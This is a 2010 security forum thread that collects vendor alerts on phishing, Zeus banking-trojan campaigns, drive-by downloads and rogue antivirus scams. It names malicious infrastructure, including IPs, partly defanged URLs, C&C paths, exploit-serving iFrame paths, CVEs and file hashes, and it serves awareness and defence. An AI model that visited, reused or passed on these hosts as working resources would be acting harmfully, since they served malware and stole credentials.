Looking for more details on webcomunicaobr .com revealed the following details:
IP: 69.162.102.130 Hosted in the USA
ASN: AS46475 LIMESTONENETWORKS Limestone Networks Inc. Primary ASN
ns1 .brasilrevenda .com
ns2 .brasilrevenda .com
Digging a little bit deeper still, three interesting pages cropped up that revealed the number of systems each contracted spammer has infected so far... a list of PHP servers where stolen information is sent... and a list of files that contained encrypted information downloaded by infected hosts..."
(Screenshots available at the TrendMicro URL above.)
:fear::mad:
AplusWebMaster
2010-01-22, 07:17
FYI...
Targeted e-mail examples relating to MS IE 0-day CVE-2010-0249
- http://securitylabs.websense.com/content/Alerts/3536.aspx
01.21.2010 - "Websense... has reports that emails linking to malicious web-based exploit code that utilizes the vulnerability CVE-2010-0249 have been sent to organizations in a targeted manner since December 2009, and the attack is still on-going. This same vulnerability was used to target Google, Adobe, and approximately 30 other companies in mid-December 2009.... Investigation has so far lead to the conclusion that these targeted attacks appear to have started during the week of 20 December 2009, and are on-going to government, defence, energy sectors and other organizations in the United States and United Kingdom. Within the malicious emails the sender's domain is spoofed to match the recipient's domain making the targeted emails more convincing to the recipient. The malicious executables that are delivered by the exploit code include hxxp ://cnn[removed]/US/20100119/ update.exe or hxxp ://usnews[removed]/ svchost.exe. These exhibit traits of an information-stealing Trojan with Backdoor capabilities. As of today only 25% of AV vendors protect against the payload according to this VT report*. Example email subjects include:
"Helping You Serve Your Customers"
"Obama Slips in Polls as Crises Dominate First Year as President"
"2010 ***** Commercial SATCOM"
"The Twelve Days of Christmas" ...
* http://www.virustotal.com/analisis/ee6d60ade4f20dd305ab27100623718d0ea8409be524d45e7b375269857fd797-1264090078
File update-exe-.txt received on 2010.01.21 16:07:58 (UTC)
Result: 11/41 (26.83%)
>>> http://forums.spybot.info/showpost.php?p=356653&postcount=110
:fear::fear:
AplusWebMaster
2010-01-25, 14:47
FYI...
40% of a month’s malware - Troj/JSRedir-AK
- http://www.sophos.com/blogs/sophoslabs/v/post/8338
January 25, 2010 - "It has been a month since we added detection for Troj/JSRedir-AK* and figures generated today show that over 40% of all web-based detections have been from this malicious code. Translating the numbers into a more human comprehensible form: 1 site every 15 secs was being detected as Troj/JSRedir-AK. The affected sites include well-known names, including:
• Energy Companies
• Retail Companies
• Automobile Club
• Hotels
...Using the JavaScript .replace the malware deobfuscates itself and dynamically writes an iframe point to a Russian website on port 8080 which serves up scripts detected as Troj/Iframe-DL. This new script will write an iframe that will attempt to load a PDF (detected as Troj/PDFJs-FY) and a file claiming to be a JPG (detected as Exp/VidCtl-A). These then will install various other malware. Troj/JSRedir-AK is a continuation of the Gumblar gang’s exploits using Russian domains instead of Chinese ones... very similar to the one we saw for Troj/JSRedir-R and the infection mechanisms seem to be the same (i.e. FTP credentials)."
(Interesting graph available at the URL above.)
* http://www.sophos.com/security/analyses/viruses-and-spyware/trojjsredirak.html
"More Info... Troj/JSRedir-AK will redirect the web browser to other malicious websites."
:fear::mad::fear:
AplusWebMaster
2010-01-26, 21:19
FYI...
Q4 '09 web-based malware data and trends
- http://blog.dasient.com/2010/01/q409-web-based-malware-data-and-trends.html
January 26, 2010 - "... the way malware is being distributed is undergoing a fundamental shift, with more attackers focusing on "drive-by downloads" from legitimate sites that have been compromised, or from sites designed specifically for malicious purposes. In nearly all the variations on this kind of attack, no user action is required for the infection to occur, beyond loading the site in a browser - and there are very few signs that malicious code has been downloaded... Based on the telemetry data we've gathered from the web, we estimate that more than 560,000 sites and approximately 5.5 million pages were infected in Q4'09, compared with more than 640,000 sites and 5.8 million pages in Q3'09. By the end of the year, we had identified more than 100,000 web-based malware infections... we saw a more significant drop in the number of infected sites than we did in the number of infected pages because each infection tended to spread to a larger number of pages on each site... more than four of every 10 sites infected in the quarter were reinfected within a space of three months... the file names most often used in drive-by downloads included things like "setup.exe," "update.exe" (which was used in the Google attack), and "install_flash_player.exe"... In previous years, a drive-by download would often initiate 10 or more extra processes, ostensibly in an attempt to maximize the return from each infected endpoint. In response, the search providers and anti-virus vendors who scan the web for infected sites began using the number of extra processes initiated as a signal that the webpage might be malicious. But in Q4'09, the average number of extra processes initiated was just 2.8 -- enough for a downloader and perhaps one or two pieces of malware. Clearly, attackers are getting smarter about the way they structure their attacks, opting for a smaller fingerprint on an infected machine in exchange for a greater likelihood of evading detection..."
:fear::mad:
AplusWebMaster
2010-01-27, 14:35
FYI...
Death hoax from hacks - actor Johnny Depp
- http://blog.trendmicro.com/hackers-exploit-actor-johnny-depp%E2%80%99s-death-hoax/
Jan. 27, 2010 - "News involving celebrity deaths (real or hoax) have a habit of spreading across the Internet like wildfire, sensationalizing bits of information to entice readers. So, it is easy to see why pranksters and cybercriminals exploit the fact that people love gossip. So when rumors of Johnny Depp’s supposed death due to a car crash broke out, it did not take long before cybercriminals took advantage of the supposed reports to spread malware via their usual blackhat search engine optimization (SEO) tactics... While most hoaxes come in the form of spammed messages, this particular scam involved the creation of several malicious sites where rigged search results led to, which led curious readers to system infections rather than to more information on Depp’s alleged death... Once users click the embedded links, however, they will be redirected to a video entertainment site that claims to host footage of Depp’s accident... Upon playing the supposed video, users will be prompted to download a codec in order to watch it, which is actually a malicious file detected by Trend Micro as TROJ_DLOADER.GRM. When executed, TROJ_DLOADER.GRM connects to a remote site to download a malicious file. It then displays a professional-looking graphical user interface (GUI) promoting a bogus software called DriveCleaner 2006 before opening a window that shows the software—an executable file—installation’s progress... never underestimate the speed at which an Internet hoax spreads. Whether seasoned Web surfer or first timer, it does not matter, it is always advisable to keep your guard up. Cybercriminals want profit. So, the more successful an attack, the more money they make..."
(Screenshots available at the URL above.)
:mad::mad:
AplusWebMaster
2010-01-28, 03:11
FYI...
Top 50 - Badware - by number of reported URLs
- http://stopbadware.org/reports/asn
Daily Change ...
How to interpret this data
- http://stopbadware.org/home/data_interpretation#asn_reports
Sample chart
- http://stopbadware.org/reports/asn/15169
Google Diagnostics
- http://www.google.com/safebrowsing/diagnostic?site=AS:15169
"Of the 723306 site(s) we tested on this network over the past 90 days, 6982 site(s), including, for example, mkdorrjvb.blogspot.com/, denisa8357.blogspot.com/, miriam8998.blogspot.com/, served content that resulted in malicious software being downloaded and installed without user consent..."
:fear::fear:
AplusWebMaster
2010-02-01, 18:58
FYI...
Valentine’s Day SPAM/scams begin...
- http://blog.trendmicro.com/early-hearts-day-presents-from-spammers/
Feb. 1, 2010 - "February has already begun, which means Valentine’s Day is close at hand. As usual, spammers will definitely hype up their malicious activities. It is only the first day of the so-called “love month” but we have already seen at least two SPAM samples leveraging one of the most-celebrated special occasions when people flock to websites that advertise gifts they can give to their loved ones... Every special occasion and/or holiday is, in today’s threat-laden Internet landscape, not just a time for people to celebrate but also a time for spammers to scam unwitting users with their devious scams... Spammed messages come in many forms and with varying payloads, some redirect users to sites that sell anything and everything under the sun, most especially pharmaceutical and replica items; some lead to links to malicious or malware-ridden sites; some lead to sites that advertise bogus promotions; and some carry malware as attachments..."
(Screenshots available at the URL above.)
:sad::fear:
AplusWebMaster
2010-02-02, 01:01
FYI...
Google Job app - malicious response
- http://securitylabs.websense.com/content/Alerts/3543.aspx?cmpid=slalert
2/1/2010 - "Websense... has discovered a new malicious spam campaign that spoofs Google job application responses. The messages look very well written and are so believable that they are probably scrapes from actual Google job application responses. Typically, spam has grammatical errors or spelling mistakes that make the messages obviously unofficial and act as red flags. The text of these messages, however, has no such mistakes, making them much more believable - especially if the target really has applied for a job with Google. The From: address is even spoofed to fool victims into believing the message was sent by Google. The messages have an attached file called CV-20100120-112.zip that contains a malicious payload. This is where the message gets suspicious, because the contents of the .zip file have a double extension ending with .exe. The attackers attempt to hide the .exe extension by preceding it with .html or .pdf, followed by a number of spaces and then the .exe extension. The .exe file (SHA1:80366cde71b84606ce8ecf62b5bd2e459c54942e) has little AV coverage* at the moment..."
* http://www.virustotal.com/analisis/d5fd8e098054a5f1b570de5d31241c1428a79fb25ec6a477261f6efaaf3d7440-1265043648
File document.htm_____________________ received on 2010.02.01 17:00:48 (UTC)
Result: 10/40 (25.00%)
(Screenshot available at the Websense URL above.)
:fear::mad:
AplusWebMaster
2010-02-03, 00:46
FYI...
Twitter mass password reset due to phishing
- http://isc.sans.org/diary.html?storyid=8137
Last Updated: 2010-02-02 21:47:04 UTC - "Twitter is sending out a large number of e-mails, asking users to reset their passwords. It appears a large number of passwords got compromised in a recent phishing incident (mine included). When I received the message at first, I considered the e-mail a phishing attempt in itself. But all the links appeared to be "good". If you receive an e-mail like this, I recommend the following procedure:
1. delete the e-mail
2. go to twitter by entering the link in your browser. Best:
use https://www.twitter.com (httpS not http)...
3. change your password.
4. do not reuse the password, do not use a simple password scheme (like "twitterpassword" and "facebookpassword")
I know it is hard. A lot of people will advise against writing the password down, or using a "password safe" application. But considering the risks, I tend to advise people to rather write down the passwords or use a password safe application compared to using bad / repeating passwords."
Reason #4132 for Changing Your Password
- http://status.twitter.com/post/367671822/reason-4132-for-changing-your-password
Feb. 2, 2010 - "... We strongly suggest that you use different passwords for each service you sign up for; more information on how to keep your Twitter account safe can be found here: http://twitter.zendesk.com/forums/10711/entries/76036 ."
:sad::fear::mad:
AplusWebMaster
2010-02-04, 18:00
FYI...
Q3-Q4 2009 - Malware in more than 1 in 10 Search Results...
- http://preview.tinyurl.com/yadn9uj
Feb 04, 2010 - "The second half of 2009 saw malware authors focus their efforts to ensure they drove victims straight to them. In contrast to the first half of the year where mass injection attacks like Gumblar, Beladen and Nine Ball promoted a sharp rise in the number of malicious Web sites, Websense Security Labs observed a slight (3.3 percent) decline in the growth of the number of Web sites compromised. Instead, attackers replaced their traditional scattergun approach with focused efforts on Web 2.0 properties with higher traffic and multiple pages. Over the six month period, Search Engine Optimization (SEO) poisoning attacks featured heavily, and Websense Security Labs research identified that 13.7 percent of searches for trending news/buzz words lead to malware. In addition, attackers continued to capitalize on Web site reputation and exploiting user trust, with 71 percent of Web sites with malicious code revealed to be legitimate sites that had been compromised... During the second half of 2009 Websense Security Labs discovered:
• 13.7 percent of searches for trending news/buzz words (as defined by Yahoo Buzz & Google Trends) lead to malware
• 95 percent of user-generated comments to blogs, chat rooms and message boards are spam or malicious
• 35 percent of malicious Web attacks included data-stealing code
• 58 percent of data-stealing attacks are conducted over the Web
• 85.8 percent of all emails were spam
• an average growth of 225 percent in malicious Web sites ..."
:fear::mad::sad:
AplusWebMaster
2010-02-07, 23:33
FYI...
Fake Firefox update site pushes adware
- http://www.infosecurity-us.com/blog/2010/2/3/fake-firefox-update-pages-push-adware/126.aspx
03/02/2010 - "Since its’ release on January 21st, the newest version of the Firefox web browser has received a great deal of attention. In just a short time it has achieved over 30 million downloads. Adware pushers are capitalizing on the success of Firefox, packing ad serving software in with the program in an effort to increase their reach. Purveyors of spyware and adware will try to take advantage of well known programs, illegitimately bundling their software into the install of the popular software. These programs are also commonly referred to as Potentially Unwanted Programs (PUPs) whose content is not necessarily malicious, but is almost never wanted by the user. These types of software are often used to collect information about the user without the users’ knowledge or consent. The latest example is found on the fake Firefox download site... (screenshot at the URL above). The page is cleverly disguised with the appearance of a legitimate Firefox download site and could easily fool many users hoping to upgrade... Taking a closer look reveals clues to the fraudulent page. While the page advertises version 3.5 the newest version is actually 3.6. There are also misspellings such as “Anti-Pishing” in the title of the security section. Victims of this scam install the “Hotbar” toolbar by Pinball Corp, formerly Zango. Not only are users subject to the annoying toolbar, they're also barraged with pop-up ads and host to a new Hotbar weather application running in the system tray... Users looking to upgrade Firefox should go to the real download site at http://getfirefox.com ..."
- http://www.theregister.co.uk/2010/02/03/fake_firefox_download/
3 February 2010
:fear::mad:
AplusWebMaster
2010-02-08, 16:18
FYI...
Gmail phish...
- http://www.f-secure.com/weblog/archives/00001876.html
February 8, 2010 - "... be aware of e-mails purportedly from Gmail administrators. One of our Fellows recently received a message from "The Google Mail Team" asking users to verify their account details to combat "anonymous registration of accounts"... The reply-to address is listed as 'verifyscecssze@gmail.com', which obviously isn't an official Gmail admin account. Meanwhile, the domain name gmeadmailcenter .com is registered to a Catholic church in Michigan. Just your typical phishing type message really. Gmail users who receive this e-mail can report it to the (real) Gmail team using the 'Report phishing' option in their account, or just delete it."
More phishing notes today (Screenshots provided at both URLs below):
- http://blog.trendmicro.com/phishing-pages-pose-as-secure-login-pages/
Feb. 8, 2010
- http://blog.trendmicro.com/caisse-d%e2%80%99epargne-customers-beware/
Feb. 8, 2010
:fear::mad:
AplusWebMaster
2010-02-08, 21:49
FYI...
Zeus Campaign Targeted Government Departments
- http://securitylabs.websense.com/content/Alerts/3546.aspx?cmpid=slalert
02.08.2010 - "Websense... has discovered a new Zeus campaign (a banking data stealing Trojan) which is now targeting government departments. Our research shows that the campaign has especially targeted workers from government and military departments in the UK and US: we found most victims' email addresses end with .gov... thousands of emails which pretend to be from the National Intelligence Council. The email subjects include:
"National Intelligence Council"
"RE: National Intelligence Council"
"Report of the National Intelligence Council"
The spoofed emails lure victims to download a document about the "2020 project"; this is actually a Zeus bot. The Web sites which host the bot look very trustworthy: one of them is a compromised organization Web site and the other is located on a popular file hosting service. The bot has rootkit capabilities and connects to C&C servers at update*snip* .com and pack*snip* .com to report back on a successful infection and to download some archives with DLLs, it also modifies the hosts file to prevent updates from popular anti-virus vendors... the anti-virus detection rate for this bot is currently at 26/40*."
* http://www.virustotal.com/analisis/82d10922cc1365a79b43a16502211ae610f56b01cd36a18db67d8a0c81c434c4-1265615954
File 2020.exe_ received on 2010.02.08 07:59:14 (UTC)
Result: 26/40 (65.00%)
(Screenshots available at the Websense URL above.)
- http://www.krebsonsecurity.com/2010/02/zeus-attack-spoofs-nsa-targets-gov-and-mil/
February 6, 2010 - "... The scam e-mails may seem legitimate because the name of the booby-trapped file mimics a legitimate 2020 Project report*** published by the NIC, which has a stated goal of providing US policymakers “with a view of how the world developments could evolve, identifying opportunities and potentially negative developments that might warrant policy action.” Only 16 of the 39 anti-virus scanners used by Virustotal.com detect the file** as malicious, and those that do mostly label it as a variant of the Zeus/Zbot Trojan..."
** http://www.virustotal.com/analisis/3c1d8359112caf87b33a4d6fedef2f2dbdf03d5d7c0d7f00883afcb6a7e2f610-1265331501
File 2020.zip.txt received on 2010.02.05 00:58:21 (UTC)
Result: 16/39 (41.03%)
*** http://www.dni.gov/nic/NIC_2020_project.html
- http://www.threatexpert.com/report.aspx?md5=3cfc97f88e7b24d3ceecd4ba7054e138
7 February 2010
- http://www.m86security.com/labs/i/Inside-a-Pushdo-Zeus-Campaign,trace.1233~.asp
February 7, 2010 M86 Security - "... another Zeus campaign that we observed last week..."
:fear::mad:
AplusWebMaster
2010-02-11, 20:37
FYI...
Zeus targeted attacks continue
- http://securitylabs.websense.com/content/Alerts/3550.aspx?
02.11.2010 - "Websense... has discovered a follow up attack on Zeus campaign targeting government departments. Its research shows that once again the campaign is targeting workers from government and military departments globally... The Websense ThreatSeeker Network has seen thousands of emails pretending to be from a reputable figure within the Central Intelligence Agency... The email subject is:
"Russian spear phishing attack against .mil and .gov employees"...
The spoofed emails capitalize on the last Zeus attack, and claim that installing the Windows update via the links provided will aid protection against Zeus attacks. The binary file downloaded from these links is identified as a Zeus bot and holds 35% AV detection rate*. Once again URLs in the email messages lead to a malicious file hosted on a compromised host, and also on a popular file hosting service. Once installed, the bot has identical functionality to the one mentioned in the previous alert. After The Zeus Rootkit component is installed the C&C server at update[removed].com is contacted to download an encrypted configuration file. Another data stealing component gets downloaded and installed from the same C&C in the shape of a Win32 Perl script compiled with Perl2Exe - this data-stealing component has only a 5% AV detection rate**. Then the bot starts to connect with a credential-based FTP server at pack[removed].com to upload stolen data. The Zeus bot is normally designed to steal banking credentials; however it has also been seen in targeted attacks to steal other sensitive data..."
* http://www.virustotal.com/analisis/696196fcc2d7803a0ebc4bdca53f03c9e1e55b15669658f9218d246d49e8c476-1265856371
File KB823988.exe received on 2010.02.11 02:46:11 (UTC)
Result: 14/41 (34.15%)
** http://www.virustotal.com/analisis/1336bca82ba370c8cf0967ed192cb1865e4f943fbb4ea4e2f6c2c9b98eb43723-1265905508
File stat.exe received on 2010.02.11 16:25:08 (UTC)
Result: 2/41 (4.88%)
(Screenshots available at the Websense URL above.)
:fear::mad::fear:
AplusWebMaster
2010-02-12, 01:40
FYI...
Spammers already using Google Buzz
- http://securitylabs.websense.com/content/Alerts/3551.aspx?
02.11.2010 - "... Today we saw the first spam using Google Buzz to spread a message about smoking.. The spammer is already following 237 people, and we can only imagine that he or she has sent similar messages to all of them. This particular message leads to a site hosted on a free Web hosting service talking about how to quit smoking. When Twitter was launched, it took a while before it was used to send spam and other malicious messages. In this case, it only took two days. It's clear that the bad guys have learned from their experience using social networks to distribute these type of messages. We hope that Google is geared up for dealing with the volume of spam it's bound to see on the new service. Until then, we advise users to be careful, as usual, when clicking on unknown links."
(Screenshot available at the URL above.)
The Buzz is getting LOUDER
- http://www.sophos.com/blogs/sophoslabs/post/8641
February 11, 2010
- http://www.eset.com/threat-center/blog/2010/02/12/is-gmail-spyware
February 12, 2010 - "... If you have a Gmail account and don’t want to broadcast to the world who you chat with and email the most, then when you log into Gmail, immediate scroll to the bottom of the page and turn off Buzz..."
:fear::fear:
AplusWebMaster
2010-02-12, 16:25
FYI...
Dear taxpayer – don’t
- http://sunbeltblog.blogspot.com/2010/02/dear-taxpayer-dont.html?
February 11, 2010 - "‘Tis the season for Zbot spam."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2010-02-16, 05:35
FYI...
IRS themed Zeus exploits...
- http://ddanchev.blogspot.com/2010/02/irsphotoarchive-themed-zeusclient-side.html
February 15, 2010 - "As anticipated, the botnet masters behind the systematically rotated campaigns dissected in previous posts, kick off the week with multiple campaigns parked on the newly introduced fast-fluxed domains. In a typical multitasking fashion, two campaigns are currently active on different sub domains introduced at the typosquatted fast-flux ones, impersonating the U.S IRS with "Unreported/Underreported Income (Fraud Application) theme", as well as a variation of the already profiled PhotoArchive campaign, using a well known "You don't have the latest version of Macromedia Flash Player" error message... researchers from M86 Security* gained access to the web malware exploitation kit..."
(More detail at the URL above.)
* http://www.m86security.com/trace/traceitem.asp?article=1233
February 7, 2010 - "... It has been up and running and serving exploits for nearly a day. In this time almost 40,000 unique users have been exposed to these exploits, and the Zeus file has been downloaded over 5000 times..."
:fear::mad:
AplusWebMaster
2010-02-16, 18:44
FYI...
The Wizard of Buzz
- http://securitylabs.websense.com/content/Blogs/3553.aspx
02.16.2010 - "Buzz is just a new wizard in the kingdom of Google. However, it is not hard to foresee through the crystal ball that Dorothy's journey along the yellow brick road will be full of constant attacks from the Witch of malware and her spamming monkeys. The biggest problem with Google Buzz is privacy. You can read lots of blogs and articles on this already, and this blog does not intend to examine this subject. It's enough to know that with Buzz, it is too easy to follow and read other people's messages... What is worrying for us is that it's now much easier to spread spam and malicious messages than before, thanks to this super-network. Google has reacted to these issues quickly and has changed the default settings of its social network. Unfortunately there is no change for existing users, so if you have already subscribed, you still need to tweak the settings for yourself to make it secure..."
- http://www.eset.com/threat-center/blog/2010/02/12/is-gmail-spyware
February 12, 2010 - "... If you have a Gmail account and don’t want to broadcast to the world who you chat with and email the most, then when you log into Gmail, immediate scroll to the bottom of the page and turn off Buzz..."
- http://www.pcworld.com/article/189388/why_google_has_become_microsofts_evil_twin.html
- http://www.f-secure.com/weblog/archives/00001886.html
February 18, 2010 - "... You don't get to use free services and expect to get absolute privacy. Either you offer up some of your information for enhanced services, or you don't. Remember, Google isn't your friend. It's a business..."
:fear:
AplusWebMaster
2010-02-19, 15:57
FYI...
Symantec ThreatCon...
- http://www.changedetection.com/log/symantec/threatconlearn_log.html
... changes: 2010-02-19 05:28 "... Symantec is aware of several reports of a strain of Zeus dubbed 'Kneber'. The Zeus exploit toolkit is often used in campaigns that have no specific target. The goal is often to infect as many systems as possible. This strain is reported to harvest personal information from the victim that attackers can use for financial gain. Customers are advised to ensure that antivirus products are up to date. Symantec detects this threat as Trojan.Zbot.
Trojan.Zbot
http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2010-011016-3514-99
Zeus Toolkits...
> http://www.symantec.com/connect/blogs/zeus-king-underground-crimeware-toolkits
August 25, 2009
- http://blog.threatfire.com/2010/02/a-zbot-botnet-dubbed-kneber.html
February 18, 2010
- http://www.netwitness.com/resources/pressreleases/feb182010.aspx
February 18, 2010
- http://www.f-secure.com/weblog/archives/00001887.html
February 19, 2010
- http://www.krebsonsecurity.com/2010/02/zeus-a-virus-known-as-botnet/
February 19, 2010
:fear:
AplusWebMaster
2010-02-21, 02:23
FYI...
Zeus exploit svr morphs in the Wild...
- http://ddanchev.blogspot.com/2010/02/irsphotoarchive-themed-zeusclient-side.html
UPDATED: Saturday, February 20, 2010 - "The client-side exploit serving iFrame directory has been changed to 91.201.196.101 /usasp11/in.php, with another typosquatted portfolio of domains currently being spamvertised.
Detection rates: update.exe - Trojan.Zbot - Result: 25/40 (62.5%) (phones back to trollar.ru /cnf/trl.jpg - 109.95.114.133 - Email: bernardo_pr @inbox .ru ); file.exe - Trojan.Spy.ZBot.12544.1 - Result: 26/41 (63.42%); ie.js - JS:CVE-2008-0015-G - Result: 14/40 (35%); ie2.js - Exploit:JS/CVE-2008-0015 - Result: 17/40 (42.5%); nowTrue.swf - Trojan.SWF.Dropper.E - Result: 24/41 (58.54%); pdf.pdf - Exploit.JS.Pdfka.bln - Result: 11/41 (26.83%); swf.swf - SWF/Exploit.Agent.BS - Result: 8/40 (20%)..."
(More detail at the ddanchev URL above.)
:fear::mad:
AplusWebMaster
2010-02-25, 00:46
FYI...
New Twitter Worm making the rounds
- http://blog.trendmicro.com/twitter-worm/
Feb. 24, 2010 - "A new Twitter worm is making the rounds. If you receive a direct message from a “friend” that contains the following message:
“This you????”
It is likely malicious. Clicking the link, http: //twitter.login.{BLOCKED}home.org/login/, will -redirect- you to a sub page of the said domain. You will then be prompted to log in to your Twitter account... Once you log in, your credentials will be stolen and all of your followers will receive a direct message from you with a link to the same site, allowing the worm to further propagate. Doubtlessly, at some point in the future, the cybercriminals behind this attack will use the same stolen credentials to send out other malicious content from a huge number of compromised Twitter accounts. So remember, think before you click!..."
(Screenshots available at the URL above.)
- http://www.f-secure.com/weblog/archives/00001893.html
February 25, 2010 - "... phrases such as "This you??" or "LOL is this you" are linking victims towards a Twitter login phishing page. If the bait is taken and victim enters their password, Twitter's infamous "fail whale" is displayed and the user is returned to their account. They might not even realize that their account details have been compromised..."
- http://sunbeltblog.blogspot.com/2010/02/twitter-search-is-finding-rogues-thanks.html
February 25, 2010
:fear::mad:
AplusWebMaster
2010-02-25, 13:53
FYI...
More-Zeus-client-side-exploits-serving-iFrame ...in the Wild...
- http://ddanchev.blogspot.com/2010/02/irsphotoarchive-themed-zeusclient-side.html
SECOND UPDATE for Wednesday, February 24, 2010 - Another portfolio of new domains is being spamvertised, using the old PhotoArchive theme. The client-side exploits serving iFrame directory has been changed to 91.201.196.101 /usasp33/in.php currently serving CVE-2007-5659; CVE-2008-2992;CVE-2008-0015; CVE-2009-0927 and CVE-2009-4324.
Sample detection rates: update.exe - Trojan-Spy.Win32.Zbot.gen - Result: 10/42 (23.81%); file.exe - Trojan-Spy.Win32.Zbot.gen - Result: 10/42 (23.81%). Samples phone back to the same C&C where samples from previous campaigns were also phoning back to - trollar.ru /cnf/trl.jpg..."
(More detail at the URL above.)
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5659
"... Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file..."
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2992
"... Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file..."
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0015
"... MS09-032... MS09-037..."
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0927
"... Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code..."
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4324
"... Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code..."
- http://blog.trendmicro.com/whats-the-juice-on-zeus/
Mar. 4, 2010 - "... ZeuS has been entrenched in the cybercriminal business for a long time now and has continuously evolved and improved. Given the vast number of toolkit versions readily available in the underground, the features ZeuS possesses to thwart both antivirus and other security solutions, as well as efforts by the security industry, ZeuS will continue to be used by cybercriminals to steal personal information and even people’s identities..."
:mad::fear::mad:
AplusWebMaster
2010-02-27, 04:16
FYI...
Rogue Facebook app propagates via users
- http://securitylabs.websense.com/content/Blogs/3563.aspx
02.26.2010 - "The latest scam targeted at Facebook users hit the public today. The rogue app, which comes in many variants of "Who is checking your profile?", has improved its technique beyond the previous attacks we've seen. Rather than spreading a single app that Facebook can easily block, it tricks users into propagating the exploit by creating a brand new Facebook application that hands over the controls to the bad guys. The attack starts with a friend, whom you trust, posting a link on your wall, asking you who is checking your profile. It also entices you by telling you that your friend is viewing your profile. The draw itself has been around for a long time, and the idea of being able to tell which users have looked at your profile is an attractive proposition. But Facebook policy and the API itself prevent this capability, which means that all applications that promise this feature are bogus... The most important thing for Facebook users to remember is that clicking “Allow” authorizes an application, and by doing so you are giving it the proverbial “keys to the kingdom.” Do not add any applications that you do not trust..."
(More detail and screenshots at the Websense URL above.)
:fear::mad:
AplusWebMaster
2010-03-01, 03:56
FYI...
Blackhat SEO PDF - Chile and Hawaii disasters
- http://securitylabs.websense.com/content/Alerts/3568.aspx?
02.28.2010 - "Over 13% of all searches on Google* looking for popular and trending topics will lead to malicious links and searching for the latest news on the earthquake in Chile and the tsunami hitting Hawaii are no exception. Both are now used to lure people into downloading fake antivirus products. Usually the links in the search results look like ordinary links pointing to regular web pages. This time the bad guys have changed tactics to make their search results look even more convincing, by tricking Google into thinking it's a PDF file... Google tells you the file format is PDF and not HTML. That's not true, it is infact a regular HTML page that when visited will redirect the user to a page that looks like this - just another rogue AV fake scanning page. This one, just like the majority or rogue AV sites we have seen this week, is in the .IN TLD which is the top-level domain for India. By making the search result look like a PDF it gives the link more authenticity. Perhaps it's a research paper or at least a more well written article. The likelihood that a user will click on these type of links is probably higher than if it were just another random web link... The Rogue AV file itself is currently detected by 26.20%** of the antivirus engines used by VirusTotal..."
* http://preview.tinyurl.com/yzv4nze
(Screenshots available at the Websense URL aabove.)
** http://www.virustotal.com/analisis/fabca4efdaf5c89d36e153637fbe92bc130f62812d6261833b073a23240260c8-1267321093
File packupdate_build6_287.exe received on 2010.02.28 01:38:13 (UTC)
Result: 11/41 (26.83%)
:fear::mad:
AplusWebMaster
2010-03-02, 20:31
FYI...
New Domains - fastflux, rogue, koobface...
- http://www.malwaredomains.com/wordpress/?p=859
March 1st, 2010 - "Upload was delayed by a few days due to weather issues from the latest storm..."
- http://www.malwaredomains.com/wordpress/?page_id=2
"The DNS-BH project creates and maintains a listing of domains that are known to be used to propagate malware and spyware... available in AdBlock and ISA Format..."
:fear:
AplusWebMaster
2010-03-02, 22:25
FYI...
ESET statistics on infections
- http://www.eset.com/threat-center/blog/2010/03/02/more-statistics-on-infections
March 2, 2010 - "... the statistics we are seeing in through our online scanner logs are consistent with our observation from last September. We are seeing an average of 3 different malware families per infected computer. This means that on average, when a computer is infected, we find three different malware families installed on it... The average of different malware families per infected hosts in the United States is close to the global average. On the other hand, this number reaches 4.5 in China where it has one of the highest values. This indicates that malware operations are not conducted the same way around the world. We usually see less bank information stealers in Asia but more online game password stealers. Online game password stealers are usually installed by other malware families and don’t propagate by themselves, explaining why we see an higher average in China than in the United States. On a daily basis, ESET is collecting more than 200,000 new and unique binary malicious files..."
___
... which translates to over 73 million new malware items for 2010, a record rate by any standard.
:fear:
AplusWebMaster
2010-03-05, 09:03
FYI...
Huge update: malicious advertising domains...
- http://www.malwaredomains.com/wordpress/?p=870
March 5, 2010 - "We are adding the malicious domains being served up at ad banner networks based on the listings at malwaredomainlist and trojaned binaries. Most of these malicious ad banners serve up fake antivirus scareware. There are also few phishing and zeus domains in this update..."
- http://www.malwaredomains.com/wordpress/?p=864
March 4, 2010 - "From SANS*: Block google-analitics (dot) net and salefale (dot) com ASAP. Sites will be added on the next update..."
* http://isc.sans.org/diary.html?storyid=8350
- http://www.malwaredomains.com/wordpress/?page_id=2
"The DNS-BH project creates and maintains a listing of domains that are known to be used to propagate malware and spyware. This project creates the Bind and Windows zone files required to serve fake replies to localhost for any requests to these, thus preventing many spyware installs and reporting. This list is also available in AdBlock and ISA Format..."
:fear::fear:
AplusWebMaster
2010-03-08, 18:52
FYI...
Energizer DUO USB Battery Charger Software Allows Remote System Access
- http://www.us-cert.gov/current/#engergizer_duo_usb_battery_charger
March 8, 2010 - "US-CERT is aware of a backdoor in the software for the Energizer DUO USB battery charger. This backdoor may allow a remote attacker to list directories, send and receive files, and execute programs on an affected system... US-CERT encourages users and administrators to review Vulnerability Note VU#154421* and apply the recommended solutions."
* http://www.kb.cert.org/vuls/id/154421
- http://www.symantec.com/connect/blogs/back-door-found-energizer-duo-usb-battery-charger-software
March 5, 2010
- http://secunia.com/advisories/38894/
Release Date: 2010-03-08
Criticality level: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Solution: Uninstall the software and remove "Arucer.dll" from the Windows system32 directory.
Original Advisory: VU#154421:
http://www.kb.cert.org/vuls/id/154421
- http://phx.corporate-ir.net/phoenix.zhtml?c=124138&p=irol-newsArticle_print&ID=1399675&highlight=
March 5, 2010 - "... Energizer has discontinued sale of this product and has removed the site to download the software..."
:fear::mad:
AplusWebMaster
2010-03-09, 12:11
FYI...
